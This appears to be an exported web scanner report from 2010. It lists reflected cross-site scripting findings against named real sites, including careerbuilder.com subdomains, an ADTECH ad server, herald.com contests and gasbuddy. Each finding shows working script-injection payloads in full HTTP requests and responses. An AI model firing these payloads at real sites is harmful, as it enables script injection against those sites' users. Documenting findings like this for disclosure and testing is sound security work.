HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 236
The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92156"><script>alert(1)</script>4d96c896b2f was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe|3.0|5310.1|1403971|0|154|ADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]92156"><script>alert(1)</script>4d96c896b2f HTTP/1.1 Host: adserver.adtechus.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 282
The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 64472><script>alert(1)</script>d67b57e15b9 was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe|3.0|5310.1|1403971|0|154|ADTECH;target=64472><script>alert(1)</script>d67b57e15b9 HTTP/1.1 Host: adserver.adtechus.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 278
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51d03"><script>alert(1)</script>8cd0b4d7f09 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe|3.0|5310.1|1403973|0|154|ADTECH51d03"><script>alert(1)</script>8cd0b4d7f09 HTTP/1.1 Host: adserver.adtechus.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 233
2.91. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403973|0|154|ADTECH [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://adserver.adtechus.com
Path:
/adiframe|3.0|5310.1|1403973|0|154|ADTECH
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc81f"><script>alert(1)</script>6147fcf2f5c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe|3.0|5310.1|1403973|0|154|ADTECH?dc81f"><script>alert(1)</script>6147fcf2f5c=1 HTTP/1.1 Host: adserver.adtechus.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 236
The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload f5a07><script>alert(1)</script>ee1b21623f9 was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe|3.0|5310.1|1403973|0|154|ADTECH;target=f5a07><script>alert(1)</script>ee1b21623f9 HTTP/1.1 Host: adserver.adtechus.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 278
The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2771"><script>alert(1)</script>fe9daaa66f4 was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe|3.0|5310.1|1403973|0|154|ADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]a2771"><script>alert(1)</script>fe9daaa66f4 HTTP/1.1 Host: adserver.adtechus.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 282
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7438e"%20a%3db%2089af122eadb was submitted in the lr parameter. This input was echoed as 7438e" a=b 89af122eadb in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /bf.ic/Florida_Miami/?lr=cbcb_mh7438e"%20a%3db%2089af122eadb&SiteID=cbcb_mh032 HTTP/1.1 Host: banking-finance.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 193077 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=3adeb3a3a665452cb3db8746cef2a482-343070718-RL-4; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC650F382261A0B497E7E52C90A9B44136C94C95BE2C9A785411BADAB46C05F6A5E15C781B87732DBDCFD; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:25:18 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:40:18 GMT; path=/ X-Powered-By: ASP.NET X-PBY: REBEL21 Date: Sun, 14 Nov 2010 22:25:18 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6025c'-alert(1)-'3bfd288b45f was submitted in the lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bf.ic/Florida_Miami/?lr=cbcb_mh6025c'-alert(1)-'3bfd288b45f&SiteID=cbcb_mh032 HTTP/1.1 Host: banking-finance.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 193722 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=903408c97ec947c08e82b77995846faa-343070747-R8-4; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC6509E4FC31D7F51112E8E6BD66A74398A35D57E2B3EBA0654540D3F956B9C1E4072777AFAB66DA72AF8; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:25:46 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:40:46 GMT; path=/ X-Powered-By: ASP.NET X-PBY: REBEL8 Date: Sun, 14 Nov 2010 22:25:46 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... in._introHTML = 'The feature you requested is only available to members. Please sign in to continue...'; CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mh6025c'-alert(1)-'3bfd288b45f&ff=21'; CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later."; CB.AJAX ...[SNIP]...
The value of the pageid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13c44"%3b859ccf53fe9 was submitted in the pageid parameter. This input was echoed as 13c44";859ccf53fe9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wireless/signup.cfm?sid=1007&pageid=textalert1_main13c44"%3b859ccf53fe9 HTTP/1.1 Host: cf.localwireless.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 14 Nov 2010 22:24:13 GMT Server: Apache P3P: CP="CAO PSA OUR" Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 4535
...[SNIP]... er out internal URLs for exit link tracking. s.s_timeZone = "-5" //Timezone for time parting plug-in. Use -5 for EST, -6 for CST, -7 for MST, and -8 for PST
/* props*/ s.pageName="textalert1_main13c44";859ccf53fe9" //gn: Page Name s.hier1="miami+herald,wap,signup,index" //h1: Hierarchy s.prop1="" //c1: internal search terms s.prop2="" //c2: internal search type s.prop3="" //c3: # of search results s.prop4= ...[SNIP]...
2.97. http://contest.herald.com/cirquekoozamiami/standard/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://contest.herald.com
Path:
/cirquekoozamiami/standard/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 460ad"><script>alert(1)</script>c14ec16b048 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cirquekoozamiami/standard/?460ad"><script>alert(1)</script>c14ec16b048=1 HTTP/1.1 Host: contest.herald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 14 Nov 2010 22:24:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 7334 Content-Type: text/html Set-Cookie: ASPSESSIONIDSQCRRCBT=NLNLEONDOGIEOKCHIODLANOL; path=/ Cache-control: private
The value of the 9cec8"><script>alert(1)</script>2f7e3e1de94 request parameter is copied into the HTML document as plain text between tags. The payload c6ae2<script>alert(1)</script>890e9b13aa5 was submitted in the 9cec8"><script>alert(1)</script>2f7e3e1de94 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the 9cec8"><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.14.2010.CONTEST.HERALD.COM request parameter is copied into the HTML document as plain text between tags. The payload 290ad<script>alert(1)</script>9c0c1192ca0 was submitted in the 9cec8"><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.14.2010.CONTEST.HERALD.COM parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.100. http://contest.herald.com/nascar/standard/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://contest.herald.com
Path:
/nascar/standard/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9cec8"><script>alert(1)</script>2f7e3e1de94 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /nascar/standard/?9cec8"><script>alert(1)</script>2f7e3e1de94=1 HTTP/1.1 Host: contest.herald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 14 Nov 2010 22:24:37 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 7834 Content-Type: text/html Set-Cookie: ASPSESSIONIDSQCRRCBT=JLNLEONDPKNMJMBLEDNCDCCF; path=/ Cache-control: private
The value of the 9cec8 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd903"><script>alert(1)</script>b536c827e11 was submitted in the 9cec8 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /nascar/standard/index.asp?9cec8bd903"><script>alert(1)</script>b536c827e11 HTTP/1.1 Host: contest.herald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ASPSESSIONIDSQCRRCBT=OLNLEONDNPOBIPOBJHDKPOKE;
Response
HTTP/1.1 200 OK Connection: close Date: Mon, 15 Nov 2010 00:21:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 7837 Content-Type: text/html Cache-control: private
2.102. http://contest.herald.com/nascar/standard/index.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://contest.herald.com
Path:
/nascar/standard/index.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a89b"><script>alert(1)</script>3188a7af4b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /nascar/standard/index.asp?8a89b"><script>alert(1)</script>3188a7af4b6=1 HTTP/1.1 Host: contest.herald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ASPSESSIONIDSQCRRCBT=OLNLEONDNPOBIPOBJHDKPOKE;
Response
HTTP/1.1 200 OK Connection: close Date: Mon, 15 Nov 2010 00:21:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 7834 Content-Type: text/html Cache-control: private
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1eb3e"%20a%3db%20422e5f94b75 was submitted in the lr parameter. This input was echoed as 1eb3e" a=b 422e5f94b75 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cs.ic/Florida_Miami/?lr=cbcb_mh1eb3e"%20a%3db%20422e5f94b75&SiteID=cbcb_mh035 HTTP/1.1 Host: customer-service.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 190637 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=42ee23d9340f4db492a4a340c1372514-343070753-R6-4; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC6508E8A7C46AB17B4CC2649D27018AC4F86CFA6335C2EB6692671084E2DB62F4AE108378824736F440F; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:25:52 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:40:53 GMT; path=/ X-Powered-By: ASP.NET X-PBY: REBEL6 Date: Sun, 14 Nov 2010 22:25:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74d08'-alert(1)-'04a0701f11a was submitted in the lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cs.ic/Florida_Miami/?lr=cbcb_mh74d08'-alert(1)-'04a0701f11a&SiteID=cbcb_mh035 HTTP/1.1 Host: customer-service.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 191278 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=eb938c0781184bcfb4d4faf5fcfe8db1-343070776-VL-4; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC6508074FA90E44D5B4F83A5472AC69B952B487300C8C40C2DDB00966E3520AE4545781BCE2F2128AA0A; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:26:15 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:41:16 GMT; path=/ X-Powered-By: ASP.NET X-PBY: REBEL33 Date: Sun, 14 Nov 2010 22:26:15 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... in._introHTML = 'The feature you requested is only available to members. Please sign in to continue...'; CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mh74d08'-alert(1)-'04a0701f11a&ff=21'; CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later."; CB.AJAX ...[SNIP]...
The value of the i request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0d2a'-alert(1)-'486dca9d5d was submitted in the i parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /feed.gbmap?k=uWvWSxgUfRhmuAhMY4lzh1MWubFHEABGPWZb1p7uSkoS3aIrL60fDQSiEuaTAQ%2b1&i=2834c0d2a'-alert(1)-'486dca9d5d HTTP/1.1 Host: df.gasbuddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 14 Nov 2010 22:25:15 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/javascript; charset=utf-8 Content-Length: 603
The value of the k request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1810'-alert(1)-'b9c2d2adc10 was submitted in the k parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /feed.gbmap?k=uWvWSxgUfRhmuAhMY4lzh1MWubFHEABGPWZb1p7uSkoS3aIrL60fDQSiEuaTAQ%2b1b1810'-alert(1)-'b9c2d2adc10&i=2834 HTTP/1.1 Host: df.gasbuddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 14 Nov 2010 22:25:15 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/javascript; charset=utf-8 Content-Length: 604
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbd5e"><script>alert(1)</script>4fe0b2c4f3c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /US/FL/Miami.htmlcbd5e"><script>alert(1)</script>4fe0b2c4f3c HTTP/1.1 Host: eltiempo.elnuevoherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 14 Nov 2010 22:26:23 GMT Server: Apache/1.3.33 (Unix) PHP/4.4.0 X-CreationTime: 3.181 Set-Cookie: ASC=1289773583:1; path=/; expires=Fri, 01-Jan-2020 00:00:00 GMT; domain=.wunderground.com Connection: close Content-Type: text/html Content-Length: 24864
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="http://eltiempo.elnuevoherald.com/US/FL/Miami.htmlcbd5e"><script>alert(1)</script>4fe0b2c4f3c?map=IRSatellite&anim=0"> ...[SNIP]...
2.108. http://eltiempo.elnuevoherald.com/US/FL/Miami.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://eltiempo.elnuevoherald.com
Path:
/US/FL/Miami.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b46d"><script>alert(1)</script>4d14efa3e5e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /US/FL/Miami.html?6b46d"><script>alert(1)</script>4d14efa3e5e=1 HTTP/1.1 Host: eltiempo.elnuevoherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 14 Nov 2010 22:25:56 GMT Server: Apache/1.3.33 (Unix) PHP/4.4.0 X-CreationTime: 3.285 Set-Cookie: ASC=1289773556:1; path=/; expires=Fri, 01-Jan-2020 00:00:00 GMT; domain=.wunderground.com Connection: close Content-Type: text/html Content-Length: 24870
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="http://eltiempo.elnuevoherald.com/US/FL/Miami.html?6b46d"><script>alert(1)</script>4d14efa3e5e=1&map=IRSatellite&anim=0"> ...[SNIP]...
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload adbee"%20a%3db%20312f0d1a369 was submitted in the lr parameter. This input was echoed as adbee" a=b 312f0d1a369 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /en.ic/Florida_Miami/?lr=cbcb_mhadbee"%20a%3db%20312f0d1a369&SiteID=cbcb_mh037 HTTP/1.1 Host: engineering.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 194088 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=9a591372b45048d197c7450f2738d22c-343070827-RP-4; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC650D89AFF5D24976CE7314F6F2F9565A4DD9C01C8ABDFDB17E60471E4011A7A49609332F6EA0B9FFBAC; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:27:07 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:42:07 GMT; path=/ X-Powered-By: ASP.NET X-PBY: REBEL25 Date: Sun, 14 Nov 2010 22:27:07 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b493'-alert(1)-'1a957c281b6 was submitted in the lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en.ic/Florida_Miami/?lr=cbcb_mh8b493'-alert(1)-'1a957c281b6&SiteID=cbcb_mh037 HTTP/1.1 Host: engineering.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 194890 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=9dc8162df01c4990b3256468ae53f08e-343070847-RS-4; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC65044DFD330AB56844A290AE2950B748B2AAA785234862F5A2BE9A14C55B142B8293BC3E047BD96D1BF; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:27:27 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:42:27 GMT; path=/ X-Powered-By: ASP.NET X-PBY: REBEL28 Date: Sun, 14 Nov 2010 22:27:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... in._introHTML = 'The feature you requested is only available to members. Please sign in to continue...'; CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mh8b493'-alert(1)-'1a957c281b6&ff=21'; CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later."; CB.AJAX ...[SNIP]...
The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3041b'-alert(1)-'6d3b4ce97bc was submitted in the lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ex.ic/Florida_Miami/?lr=cbcb_mh3041b'-alert(1)-'6d3b4ce97bc&SiteID=cbcb_mh038 HTTP/1.1 Host: executive.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
